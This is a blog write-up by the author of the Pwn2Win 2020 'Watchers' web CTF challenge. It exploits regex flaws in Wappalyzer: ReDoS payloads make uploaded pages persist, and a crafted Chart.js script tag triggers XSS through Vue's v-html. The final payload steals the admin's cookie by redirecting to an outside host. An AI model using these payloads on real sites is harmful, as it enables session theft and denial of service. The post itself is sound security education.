<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<head>
  <link href="https://gmpg.org/xfn/11" rel="profile">
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta name="generator" content="Hugo 0.82.0" />

  
  <meta name="viewport" content="width=device-width, initial-scale=1.0">

  <title>Watchers: Write-Up &middot; lemons lab</title>
  <meta name="description" content="Watchers writup from this year&#39;s pwn2win" />

  
  <link type="text/css" rel="stylesheet" href="https://vrechson.github.io/css/print.css" media="print">
  <link type="text/css" rel="stylesheet" href="https://vrechson.github.io/css/poole.css">
  <link type="text/css" rel="stylesheet" href="https://vrechson.github.io/css/syntax.css">
  <link type="text/css" rel="stylesheet" href="https://vrechson.github.io/css/hyde.css">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Abril+Fatface|PT+Sans:400,400i,700">


  
  <link rel="apple-touch-icon-precomposed" sizes="144x144" href="/apple-touch-icon-144-precomposed.png">
  <link rel="shortcut icon" href="/favicon.png">

  
  
</head>

  <body class=" ">
  <aside class="sidebar">
  <div class="container sidebar-sticky">
    <div class="sidebar-about">
      <a href="https://vrechson.github.io/"><h1>lemons lab</h1></a>
      <p class="lead">
       Just another blog for hacking stuff 
      </p>
    </div>

    <nav>
      <ul class="sidebar-nav">
        <li><a href="https://vrechson.github.io/">Home</a> </li>
        <li><a href="https://github.com/vrechson"> Github </a></li><li><a href="https://hackerone.com/vrechson"> Hackerone </a></li><li><a href="https://twitter.com/vrechson"> Twitter </a></li>
      </ul>
    </nav>

    <p>&copy; 2021. All rights reserved. </p>
  </div>
</aside>

    <main class="content container">
    <div class="post">
  <h1>Watchers: Write-Up</h1>
  <time datetime=2020-06-03T14:09:33-0300 class="post-date">Wed, Jun 3, 2020</time>
  <p>Hi folks, this is a write up for my challenge in this year&rsquo;s Pwn2Win edition, the environment docker is available at <a href="https://github.com/pwn2winctf/challenges-2020/tree/master/web-Watchers">pwn2win repository</a>, hope you enjoy!</p>
<p><strong>Description:</strong> Welcome to Static Web Host! During all these years of static website development, Rebellious Fingers found out that the biggest hole in our security is the use of insecure third-party applications. To help our members mitigate this problem, and not be compromised by our enemies, we decided to implement a third-party app to help them identify which technologies their pages are running so they can check whether there is anything vulnerable before deployment.</p>
<p><strong>This challenge was only solved by <a href="https://twitter.com/PlaidCTF">@PlaidCTF</a> and  <a href="https://twitter.com/justCatTheFish">@JustCatTheFish</a> (which wrote an <a href="https://github.com/justcatthefish/ctf-writeups/tree/master/2020-05-31-Pwn2win/web-watcher">amazing writeup</a>). Congratulations!</strong></p>
<h2 id="technical-overview">Technical Overview</h2>
<p>The objective here is to find and exploit a 0day in a tool called <a href="https://github.com/AliasIO/wappalyzer">Wappalyzer</a> (version 6.0.2), which runs a lot of regex expressions against web pages to identify which technologies are running. As you can see <a href="https://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags/1732454">here</a>, regex isn&rsquo;t the proper way to parse HTML leading to problems like the ones shown in this challenge.</p>
<p>With further analysis, this tool opens a web page (using puppeteer) and splits it into different groups. Such as: meta tags, HTML code, script tags, javascript variables, HTTP headers, etc. Then, each group is parsed by its group corresponding to the regular expression in source code, like the example:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-JSON" data-lang="JSON">{
  <span style="color:#f92672">&#34;Vue.js&#34;</span>: {
    <span style="color:#f92672">&#34;cats&#34;</span>: [
      <span style="color:#ae81ff">12</span>
    ],
    <span style="color:#f92672">&#34;html&#34;</span>: <span style="color:#e6db74">&#34;&lt;[^&gt;]+\\sdata-v(?:ue)?-&#34;</span>,
    <span style="color:#f92672">&#34;icon&#34;</span>: <span style="color:#e6db74">&#34;Vue.js.png&#34;</span>,
    <span style="color:#f92672">&#34;js&#34;</span>: {
      <span style="color:#f92672">&#34;Vue.version&#34;</span>: <span style="color:#e6db74">&#34;^(.+)$\\;version:\\1&#34;</span>
    },
    <span style="color:#f92672">&#34;script&#34;</span>: [
      <span style="color:#e6db74">&#34;vue[.-]([\\d.]*\\d)[^/]*\\.js\\;version:\\1&#34;</span>,
      <span style="color:#e6db74">&#34;(?:/([\\d.]+))?/vue(?:\\.min)?\\.js\\;version:\\1&#34;</span>
    ],
    <span style="color:#f92672">&#34;website&#34;</span>: <span style="color:#e6db74">&#34;https://vuejs.org&#34;</span>
  }
}
</code></pre></div><p>Knowing this, we can see how easily we could trick this tool into detecting a <strong>Vuejs</strong> environment by just inserting the tag <code>&lt;a data-v-pwn2win&gt;</code> into our page:</p>
<p><img src="https://i.imgur.com/kN0MNlq.png" alt="Vuejs being detected"></p>
<h2 id="practical-overview">Practical Overview</h2>
<p>The challenge has three pages:</p>
<p><strong>Main:</strong> This page is an HTML page editor that allows the user to change code from three different tabs: <em>home</em>, <em>about</em>, and <em>contact</em>. The user can change everything on the page except for a meta tag with <em>Content-Security-Policy</em> setting the default source to none. There is also a weaponlyzer button that sends this page&rsquo;s content to the server and displays the wappalyzer result after executing it in all these pages.<br>
<strong>Check:</strong> This page receives a same-origin URL as an argument and shows the wappalyzer result for the given address.<br>
<strong>Bug report:</strong> It is just a form saying that the admin will analyze the submitted URL with wappayzer through the check page.</p>
<p>It&rsquo;s important to highlight some others concerns about the main page:</p>
<ol>
<li>We do have the code from weaponzyer button function</li>
<li>Each tab accepts no more than 1500 chars, or it returns an error</li>
<li>Refresh meta tag was filtered out (although there was an unintended bypass to it, exploitation wasn&rsquo;t possible due to the resources load time limit I set in wappalyzer)</li>
<li>There is no way to bypass the CSP directives</li>
</ol>
<p><img src="https://i.imgur.com/HChTHuQ.png" alt=""></p>
<h2 id="solving-the-challenge">Solving the challenge</h2>
<p>Now that we had a general overview of this challenge, we can start to think of how we can solve it.</p>
<p>The code provided shows that it will create a page for each tab in the index editor. Then, it will run every tab against the wappalyzer tool, display the results, and delete them. Except if the wappalyzer takes more than 20 seconds to run, then it will return an error with the page URL without deleting the file. As shown in the code bellow:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-PHP" data-lang="PHP"><span style="color:#f92672">&lt;?</span><span style="color:#a6e22e">php</span>
<span style="color:#66d9ef">for</span>($i <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; $i <span style="color:#f92672">&lt;</span> <span style="color:#ae81ff">3</span>; $i<span style="color:#f92672">++</span>) {
    $output <span style="color:#f92672">=</span> <span style="color:#a6e22e">shell_exec</span>(<span style="color:#e6db74">&#39;timeout -k 3s 20s wappalyzer -w 8 &#39;</span> <span style="color:#f92672">.</span> <span style="color:#a6e22e">escapeshellarg</span>(<span style="color:#a6e22e">escapeshellcmd</span>($targets[$i])));
    $json <span style="color:#f92672">=</span> <span style="color:#a6e22e">json_decode</span>($output, <span style="color:#66d9ef">true</span>);

    <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">json_last_error</span>() <span style="color:#f92672">===</span> <span style="color:#a6e22e">JSON_ERROR_NONE</span>) {

        <span style="color:#a6e22e">unlink</span>(<span style="color:#a6e22e">realpath</span>(<span style="color:#a6e22e">substr</span>(<span style="color:#a6e22e">parse_url</span>($targets[$i])[<span style="color:#e6db74">&#34;path&#34;</span>], <span style="color:#ae81ff">1</span>)));

        <span style="color:#66d9ef">foreach</span> ($json[<span style="color:#e6db74">&#39;applications&#39;</span>] <span style="color:#66d9ef">as</span> $tech) {

            $entry <span style="color:#f92672">=</span> <span style="color:#66d9ef">new</span> <span style="color:#a6e22e">class</span>{};

            $entry<span style="color:#f92672">-&gt;</span><span style="color:#a6e22e">name</span> <span style="color:#f92672">=</span> $tech[<span style="color:#e6db74">&#34;name&#34;</span>];
            $entry<span style="color:#f92672">-&gt;</span><span style="color:#a6e22e">version</span> <span style="color:#f92672">=</span> $tech[<span style="color:#e6db74">&#34;version&#34;</span>];

            $category <span style="color:#f92672">=</span> <span style="color:#a6e22e">array_values</span>($tech[<span style="color:#e6db74">&#34;categories&#34;</span>])[<span style="color:#ae81ff">0</span>];

            <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span><span style="color:#a6e22e">array_key_exists</span>($category, $applications))
                $applications[$category] <span style="color:#f92672">=</span> [];

                <span style="color:#66d9ef">if</span>(<span style="color:#f92672">!</span><span style="color:#a6e22e">in_array</span>($entry, $applications[$category], <span style="color:#66d9ef">false</span>))
                    <span style="color:#a6e22e">array_push</span>($applications[$category], $entry);

        } 
    } <span style="color:#66d9ef">elseif</span> ($output <span style="color:#f92672">==</span> <span style="color:#e6db74">&#39;&#39;</span>) {
        <span style="color:#66d9ef">return</span> <span style="color:#e6db74">&#39;Couldn\&#39;t analyze your file, please ask the admin 
</span><span style="color:#e6db74">        to try weaponlyze in your page - URL: &#39;</span> <span style="color:#f92672">.</span> <span style="color:#a6e22e">substr</span>(<span style="color:#a6e22e">parse_url</span>($targets[$i])[<span style="color:#e6db74">&#34;path&#34;</span>], <span style="color:#ae81ff">1</span>);
    } <span style="color:#66d9ef">else</span> {
        <span style="color:#a6e22e">unlink</span>(<span style="color:#a6e22e">realpath</span>(<span style="color:#a6e22e">substr</span>(<span style="color:#a6e22e">parse_url</span>($targets[<span style="color:#ae81ff">0</span>])[<span style="color:#e6db74">&#34;path&#34;</span>], <span style="color:#ae81ff">1</span>)));
        <span style="color:#a6e22e">unlink</span>(<span style="color:#a6e22e">realpath</span>(<span style="color:#a6e22e">substr</span>(<span style="color:#a6e22e">parse_url</span>($targets[<span style="color:#ae81ff">1</span>])[<span style="color:#e6db74">&#34;path&#34;</span>], <span style="color:#ae81ff">1</span>)));
        <span style="color:#a6e22e">unlink</span>(<span style="color:#a6e22e">realpath</span>(<span style="color:#a6e22e">substr</span>(<span style="color:#a6e22e">parse_url</span>($targets[<span style="color:#ae81ff">2</span>])[<span style="color:#e6db74">&#34;path&#34;</span>], <span style="color:#ae81ff">1</span>)));
    }

}

</code></pre></div><p>Putting together that the code returns the page URL if wappalyzer takes too long to run, and a message saying &ldquo;please ask the admin to try weaponlyze in your page&rdquo;. It seems that we need to find a way to make a page take more than 20 seconds to be analyzed by wappalyzer to keep the file in the system.</p>
<p>This seems to mean that the admin will run the weaponlyzer function through our page. In contrast, bug report page displays the following message: Send your page to the admin so they can <strong>recheck your page with weaponlyzer in /check</strong> and look for any issues. In other words we can assume that the admin will take our URL and send it to the <code>/check</code> endpoint.</p>
<p>Looking into this endpoint, we can submit the default URL and see that this page does pretty much the same thing as the index, differing only by the fact that you need to submit an internal URL instead of uploading your content.</p>
<p>Based on this informations, we can say that we need to:</p>
<ol>
<li>Make wappalyzer takes more than 20 seconds analyzing our page to keep our file in the server</li>
<li>Do something with the URL of our file to send it to the admin</li>
</ol>
<p>To accomplish the first step, we need to go deeper into how the wappalyzer internals works: <strong>regex processing</strong>. By reading its source code, we can look for problematic regex structures where it&rsquo;s possible to trigger a catastrophic regression. Cleaning the <a href="https://github.com/AliasIO/wappalyzer/blob/master/src/apps.json">regex file</a> and running all regexes through a tool like <a href="ttps://github.com/2bdenny/ReScue">ReScue</a> you should be able to find, at least, two different payloads that completely breaks wappalyzer:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-HTML" data-lang="HTML">&lt;<span style="color:#f92672">meta</span> <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;GENERATOR&#34;</span> <span style="color:#a6e22e">content</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;IMPERIA 46197946197946197946197946197946197946197946197946197946197946197946197946197946197946197946197946197966228761662296:&#34;</span>/&gt;
&lt;<span style="color:#f92672">script</span> <span style="color:#a6e22e">src</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#39;//c.c..j..c.c..j..c.c..j..c.c..j..c.c..j..c.c..j..c.c..j..c.c..j..jskhtlcnipmos.cdnjs.cdnjs.dnjs.cdnjs.cloudflar.jsjs.cloudf&#39;</span>&gt;&lt;/<span style="color:#f92672">script</span>&gt;
</code></pre></div><p>(or more, as <a href="https://twitter.com/justCatTheFish">@JustCatTheFish</a>  describes a different payoad in their <a href="https://github.com/justcatthefish/ctf-writeups/tree/master/2020-05-31-Pwn2win/web-watcher">writeup</a>).</p>
<p>Running weaponlyzer function with one of these two tags on our page, leads to the described error message with our home URL. Just as illustrated below:</p>
<p><img src="https://i.imgur.com/ND1jM8o.png" alt=""></p>
<p>Okay, now that we can create files in the server, we have a URL to send to the bot, but we still don&rsquo;t know what to do with it. To achieve this goal, let&rsquo;s go back to the technical overview, where I point out that we can force some wappalyzer responses. In that example, I choose Vue to demonstrate my point, but let&rsquo;s try something different now, using the <strong>AMP Plugin</strong> shown below:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-JSON" data-lang="JSON">{
  <span style="color:#f92672">&#34;AMP Plugin&#34;</span>: {
    <span style="color:#f92672">&#34;cats&#34;</span>: [
      <span style="color:#ae81ff">1</span>,
      <span style="color:#ae81ff">5</span>
    ],
    <span style="color:#f92672">&#34;icon&#34;</span>: <span style="color:#e6db74">&#34;Accelerated-Mobile-Pages.svg&#34;</span>,
    <span style="color:#f92672">&#34;implies&#34;</span>: <span style="color:#e6db74">&#34;WordPress&#34;</span>,
    <span style="color:#f92672">&#34;meta&#34;</span>: {
      <span style="color:#f92672">&#34;generator&#34;</span>: <span style="color:#e6db74">&#34;^AMP Plugin v(\\d+\\.\\d+.*)$\\;version:\\1&#34;</span>
    },
    <span style="color:#f92672">&#34;website&#34;</span>: <span style="color:#e6db74">&#34;https://amp-wp.org&#34;</span>
  },
}
</code></pre></div><p>This version indicated in the regex means that it will be replaced by the first <code>\1</code> group in the wappalyzer response. Also, since the version is grouped by a <code>(\\d+\\.\\d+.*)</code>, it means that we can change the value to an arbitrary text using a special crafted meta tag:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-HTML" data-lang="HTML">&lt;<span style="color:#f92672">meta</span> <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;GENERATOR&#34;</span> <span style="color:#a6e22e">content</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;AMP Plugin v1.2.a my arbitrary text&#34;</span>&gt;
</code></pre></div><p>Resulting in:</p>
<p><img src="https://i.imgur.com/BgmupTS.png" alt=""></p>
<p>We have a point of arbitrary text injection. It may be vulnerable to XSS, but trying to enter the value <code>&lt;meta name=&quot;GENERATOR&quot; content=&quot;AMP Plugin v1.2.a &lt;svg/onload=alert(1)&gt;&quot;&gt;</code> didn&rsquo;t work. Maybe this isn&rsquo;t vulnerable to XSS? The answer is in the <a href="https://github.com/pwn2winctf/challenges-2020/blob/master/web-Watchers/deploy/watchers/js/app.9c65c4c0.js.map">VueJS .map file</a>, which isn&rsquo;t deleted by default. Therefore we can easily retrieve the VueJS original code:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-HTML" data-lang="HTML">&lt;<span style="color:#f92672">md-list</span> <span style="color:#a6e22e">v-for</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;(value, name) in weapon.data&#34;</span> <span style="color:#a6e22e">v-bind:key</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;value&#34;</span>&gt;
    &lt;<span style="color:#f92672">md-list-item</span> <span style="color:#a6e22e">v-for</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;data in value&#34;</span> <span style="color:#a6e22e">v-bind:key</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;data&#34;</span>&gt;{{data.name}}
        &lt;<span style="color:#f92672">code</span> <span style="color:#a6e22e">v-html</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;data.version&#34;</span>&gt;&lt;/<span style="color:#f92672">code</span>&gt;
    &lt;/<span style="color:#f92672">md-list-item</span>&gt;
&lt;/<span style="color:#f92672">md-list</span>&gt;
</code></pre></div><p>The presence of <code>v-html</code> show us that this is vulnerable according to <a href="https://vuejs.org/v2/guide/security.html#Injecting-HTML">VueJS  documentation</a>. Wait, this is the exact statement that we control! So, yes, we have a vulnerable endpoint, which is good but still imposes us some restrictions:</p>
<ol>
<li>CSP won&rsquo;t allow javascript execution, so the regexes applied in javascript by wappalyzer won&rsquo;t work!</li>
<li>Wappalyzer parses meta tags with the following regex: <code>/&lt;meta[^&gt;]+&gt;/gi</code>, due to this behavior, the <code>&lt;meta name=&quot;GENERATOR&quot; content=&quot;AMP Plugin v1.2.a &lt;img src=x onerror=alert(1)&gt;&quot;&gt;</code> tag won’t work, since the first &gt; will be recognized as the meta tag ending.</li>
<li>We cannot bypass the previous restriction by omitting the last <code>&gt;</code>. Since VueJS uses innerHTML replacement, which happens after DOM loading, the page won&rsquo;t understand it as code.</li>
<li><code>1.</code> and <code>2.</code> addresses all possible regexes with <code>(.*)</code> or <code>(.+)</code> groups for version substitution, so we need to find another way to do that. (Actually, a new release of wappalyzer one day before pwn2win introduced one new tag that fits this category without using javascript or meta tag, as shown in <a href="https://github.com/justcatthefish/ctf-writeups/tree/master/2020-05-31-Pwn2win/web-watcher">JustCatTheFish writeup</a>)</li>
</ol>
<p>To bypass this problem, I looked for another way of matching strings, the <code>[^something]</code> (everything different from something). And I found a perfect match: <code>chartjs\\.org/dist/([\\d.]+(?:-[^/]+)?|master|latest)/Chart.*\\.js\\;version:\\1</code> in which the <code>(?:-[^/]+)</code> part of the subtitution group accepts all characteres different from a <code>/</code>, meaning I could exploit it using the following payload:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-HTML" data-lang="HTML">&lt;<span style="color:#f92672">script</span> <span style="color:#a6e22e">src</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;data:chartjs.org/dist/45544-aaaaaaaaaaa&lt;img src=x onerror=&#39;alert(1)&#39;&gt;/Chart.asdasdasdasdasd.js&#34;</span>&gt;&lt;/<span style="color:#f92672">script</span>&gt;
</code></pre></div><p><img src="https://i.imgur.com/7DINx6d.png" alt=""></p>
<h2 id="put-it-all-together">Put it all together</h2>
<p>Now that we can create persistent files and trigger XSS, we just need to find a way to make the XSS payload execute before the ReDoS crashes wappalyzer. Fortunately, we have more than one page to edit! As soon as we receive the URL in the error message caused by the ReDoS crash, it is possible to notice that it comes in the format: <code>hash-home.html</code>, which we can just substitute to <code>hash-about.html</code> or <code>hash-contact.html</code>. We could put the ReDoS in the <strong>home</strong> page and the XSS in the <strong>about</strong> or <strong>contact</strong> page, then send the one that contains the XSS to the admin.</p>
<p>The steps to execute the attack described above are:</p>
<ol>
<li>Place in the home tab the ReDoS payload:</li>
</ol>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-HTML" data-lang="HTML">&lt;<span style="color:#f92672">meta</span> <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;GENERATOR&#34;</span> <span style="color:#a6e22e">content</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;IMPERIA 46197946197946197946197946197946197946197946197946197946197946197946197946197946197946197946197946197966228761662296:&#34;</span>/&gt;
</code></pre></div><ol start="2">
<li>Place in the about tab the XSS snippet:</li>
</ol>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-HTML" data-lang="HTML">&lt;<span style="color:#f92672">script</span> <span style="color:#a6e22e">src</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;data:chartjs.org/dist/45544-aaaaaaaaaaa&lt;img src=x onerror=&#39;location=`https:abrasax.club?${document.cookie}`&#39;&gt;/Chart.asdasdasdasdasd.js&#34;</span>&gt;&lt;/<span style="color:#f92672">script</span>&gt;
</code></pre></div><ol start="3">
<li>Click in wappalyzer button, wait 20 seconds to get the URL back.</li>
<li>Send the XSS URL to the admin (<code>-about.html</code>)</li>
<li>Get the flag:  <code>CTF-BR{stackoverflow.com/revisions/1732454/11}</code></li>
</ol>
<h2 id="considerations">Considerations</h2>
<ul>
<li>The first consideration I had to do is that I had a lot of help from my teammates <a href="https://twitter.com/caioluders">@caioluders</a> and <a href="https://twitter.com/lbherrera_">@lbherrera_</a> during the process of development and tests for this challenge. The hard time we took to develop and test this challenge resulted in another wappalyzer 0day due to irresponsible use of zombiejs in their source code (which was surprisingly fixed just ONE DAY before the event). Thanks guys, I couldn&rsquo;t do it without your help.</li>
<li>I want also to thank my university teacher and mentor <a href="https://twitter.com/thotypous">@thotypous</a> who always makes the best effort to help me in infosec studying, and <a href="https://www.linkedin.com/in/lorhansohaky/">@lorhansohaky</a> for answer all my inifine VueJS doubts :p</li>
<li>I hope you guys enjoyed this Pwn2Win edition, and that we see each other in the next one!</li>
</ul>
</div>


    </main>

    
      
    
  </body>
</html>
